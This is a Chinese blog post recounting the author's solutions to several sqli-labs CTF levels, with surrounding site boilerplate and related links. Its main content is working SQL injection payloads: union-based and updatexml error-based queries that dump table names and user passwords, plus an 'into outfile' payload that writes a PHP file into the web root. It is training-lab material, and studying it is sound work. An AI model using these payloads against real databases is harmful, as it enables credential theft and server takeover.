ctf比赛解体复现

最新推荐文章于 2024-08-13 19:11:09 发布
最新推荐文章于 2024-08-13 19:11:09 发布
阅读量753 收藏 12
点赞数 21
文章标签: oracle sql 数据库 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69294474/article/details/140933879
版权

第一题:

根据提示可以发现是get传参,在url一栏输入参数id也就是/?id=xxx

尝试注入:

?id=1'order by 1--+

最终发现是3列,继续用union尝试

?id=1'union select 1,2,database()--+

发现页面没有显示数据库的库名,但是也没有报错,所以应该是被限制输出一行了。于是随便搞一个id值

我这里就让id为负一试试,发现了数据库名字是   security,并且也找到注入点了,于是乎直接破题!

?id=-1'union select 1,2,database()--+

?id=qffd'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

ok现在有表名了,注意哈这里得用group_concat()函数把tablename抱起来,不然会报错受那个limit的影响,接下来继续找列名,发现有3个名字

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+

接下来直接拿密码

?id=-1'union select 1,group_concat(username),group_concat(password) from users--+

第五题

发现正确输入的话,是正常页面没有什么信息,但是错误的话会有报错信息,于是考虑报错注入

?id=1'union select updatexml(1,concat(database()),1)--+

发现列明报错了,就是列的数量于是用order by继续尝试

?id=1'order by 3--+

?id=1'order by 4--+

发现是3列,就是3个字段于是乎继续尝试!

?id=1'union select 1,2,updatexml(1,concat(0x7e,database(),0x7e),1)--+

发现了库名继续找表名,这里代替database()的部分要加上括号

?id=1'union select 1,2,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

现在继续找列名

?id=1'union select 1,2,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e),1)--+

列明有了现在可以直接查了!

?id=1' and updatexml(1,substr(concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1,32),1)--+

第7题

上传一个文件

?id=1')) union select 1,2,"<?php phpinfo();" into outfile "E:/phpstudy/phpstudy_pro/WWW/sqli-labs-php7-master/w.php";--+

这里显示要改那个参数我就不改了应该命令是没问题的

11题

题目做多了直接报答案

asdfaf' union select group_concat(username), group_concat(password) from users --  

15题

通过2分布尔盲注已经出了

不多浪费时间直接上结果

ξ流ぁ星ぷ132
关注
  • 21
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF | CTF比赛题解分享
hackzkaq的博客
10-09 7463
前言:由于此次比赛的题目较多,所以这是这个比赛的第一篇wp,共20题,先记录一下,防止忘记。里面有些题目是新手题较为简单,但也有许多有意思的题目,真的是做的过程痛不欲生,做完才感觉到酣畅淋漓,废话不多说,开写。接下来就可以定位了。1.这次显示文件是个jpg格式的图片,但是打不开,16进制编辑器打开,看到文件头出现了IHDR头,就可以想到其实是个png格式的图片,再看到文件尾,更加证实了是个png文件。4.第三张照片是最头疼的,全都是高楼,能够看到的只有广西农信,时代丽都,搜索相关位置,找到了大概区域。
2019某行业CTF大赛题目复现——图片隐写
qwsn
11-06 2457
0x01上题目附件: 百度网盘地址 提取码 https://pan.baidu.com/s/13hDSgmW4cn9gEWqHjJrWIw 20ra 0x02WP复现: 1.打开图片:发现宽和高好像没有什么问题; 但是我们还是使用010软件,修改后查看一下,万一就是那么简单呢? 一顿操作猛如虎,一看战绩一杠五。。。。。。发现改完宽高后,图片损坏了,无法打开。看来要使用其他方法...
CTF比赛必备常用工具
热门推荐
Eason_LYC安全白帽子的成长博客
07-04 2万+
CTF常用工具stegsolve、Winhex、IDA、Ziperello、QR_Research、Exeinfo字典等应有尽有
搭建CTF比赛平台
飞花的世界
08-12 9459
http://123.206.21.163 这个是我按照 这个人的代码,修改后的。说实话,这个平台写的很精简,也很棒。代码啥的也很舒服,可惜就是没文档,所以最开始的时候,花了我两天时间大致阅读完了,知道哪一比分怎么改,干嘛的。上面的网址是效果。 接下来放他的github地址 PS 下面有演示图片,但是因为是异步加载图片,所以有点慢,等下就好。这个比赛平台做的真的挺好的 https://git...
CTF比赛的简单了解
haxplayer的博客
10-12 1589
CTF比赛的简单了解
CTF赛题下载、复现、解题方法
renxq097的博客
04-07 3711
CTF赛题下载、复现、解题方法 看过这篇文章,你将学会自己搭建大佬们在github中分享的赛题进行复现 我们以靶场其中的(web_gift)进行复现 一、操作系统准备 你需要一个linux操作系统并完成docker搭建。 系统:ubuntu 安装网上教程一大堆,这里推荐一个: https://www.cnblogs.com/liujiaxin2018/p/14207930.html 二、ubuntu搭建docker环境 网上搭建docker一堆坑,对新手很不友好,建议看官网的最新命令 更
基于Django的CTF比赛平台
test
07-09 2345
前言 该CTF比赛平台项目整体基于Django 2.0、Python 3.6、Bootstrap开发,本项目github地址:暂时留空,等待后继开源。 该CTF比赛平台适用于简单的比赛环境,相对于传统开源CTF比赛平台(例如CTFd等),轻量易于部署,基础功能完善。 正文 平台功能简述 该平台分为两类角色,一类角色为参赛选手,另一类为平台管理员(需要使createsuperuser命令创建)。其中参赛选手可分为队长和队员,创建队伍的成员身份默认为队长,而队员可根据队伍名称加入队伍。管理员看进入平台后台进行
使用docker复现CTF环境
weixin_45887311的博客
04-02 1011
使用docker复现CTF环境 docker环境的安装我也是看网上的教程,有很多自行百度。记录一些关于docker复现环境使用的一些操作。 一些docker的配置 刚刚安装好docker的需要开启服务 service docker start 再将docker服务设置为开机自启 systemctl enable docker.service 安装docker-compos...
ctf比赛文件下载网站
m0_51251108的博客
10-03 1028
ctf比赛文件下载
CTF比赛题目复现源码+项目说明.zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 3、本资源作为“参考资料...CTF比赛题目复现源码+项目说明.zip
ctf比赛常用工具软件
04-21
ctf比赛常用软件工具,包括隐写、编辑、webtool(蚁剑、御剑)、exe、misc杂项、数据库相关工具
用于备份CTF比赛题目,仅队内复现使用.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
ctf比赛题目.zip
08-24
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
SilentEye,用于CTF比赛
01-24
SilentEye,用于CTF比赛
数据库:数据定义和数据库的完整性
茜茜西西的博客
08-13 500
建立一个数据库XSCJ,自行规定各项参数;建立Course表,录入数据库表中相应元组;修改Course表增加一列,开课学期,数据类型自定义;为Course表的Cname列建立唯一索引,索引名Cname_idx;删除唯一索引Cname_idx;删除基本表Student;删除数据库XSCJ 拓展:创建一个名为BSXT的数据库,初始大小5MB,最大大小10MB,允许数据库自动增长,增长方式按10%比例增长;日志文件初始为2MB,最大可增长到5MB,按1MB增长;将BSXT数据库的主数据文件最大大小改为不限制;
MySQL学习[4] ——MySQL
最新发布
shenfenxihuan的博客
08-13 576
全局锁就是**对整个数据库实例加锁全库逻辑备份**等场景。加上全局(读)锁后,整个数据库都是。若数据库的数据较多,导致整个处理流程较慢,数据库长时间为只读状态,造成业务停滞、服务长时间不可用。因此,由于,在备份数据库之前先开启事务。整个事务执行期间都在用这个 Read View,而且由于 MVCC 的支持,备份期间业务依然可以对数据进行更新操作。而如。
ORACLE 使用CONCAT()函数报错
calabash_man的博客
08-09 223
[TOC](ORACLE 使用CONCAT()函数报错)
Oracle【plsql编写九九乘法表】
只有登上山顶,才能看到那边的风光
08-08 262
😹 觉得博主文章写的不错的话,希望大家三连(✌关注,✌点赞,✌评论),多多支持一下!!!
数据库SQL——数据库操作的核心语言
upgrador的博客
08-13 568
SQL(结构化查询语言)是关系型数据库管理系统中的标准语言,广泛用于数据的定义、操作、控制和查询。SQL 包含多个子语言,分别用于不同的数据库操作任务,包括数据定义(DDL)、数据操纵(DML)、数据控制(DCL)、数据查询(DQL)和事务控制(TCL)。本文将详细介绍这些子语言的作用、常用命令,并通过示例代码展示它们的实际应用。
ctf比赛理论题题库
07-27
CTF比赛理论题题库是一个包含一系列理论问题的题库,用于帮助参与者通过回答问题来测试和提高他们的理论知识和技能。这些问题通常涵盖计算机和网络安全领域的各个方面,例如密码学、漏洞利用、网络协议等。 CTF比赛理论题题库的目的是让参与者在实际的CTF比赛中更好地理解和解决问题。它们可以帮助参与者加深对某些概念和原理的理解,并帮助他们思考和分析问题的能力。对于那些希望在CTF比赛中取得好成绩的人来说,掌握这些理论知识非常重要。 这些题库中的问题通常是多选、单选或填空题的形式。参与者需要根据自己的知识和经验选择正确的答案或填写正确的答案。有些题目可能需要参与者进行计算或进行推断,以便找到正确的答案。 CTF比赛理论题题库不仅对于参与者来说是一个学习工具,也是一个评估工具。参与者可以通过回答这些问题来自我评估和调整自己的学习进度和知识水平。同时,CTF比赛组织者也可以使用这些题库作为选拔和评分工具,来确定参与者的能力和成绩。 总之,CTF比赛理论题题库是一个重要的学习和评估工具,它帮助参与者测试和提高他们的理论知识和技能,同时也给比赛组织者提供一种评估参与者能力的手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值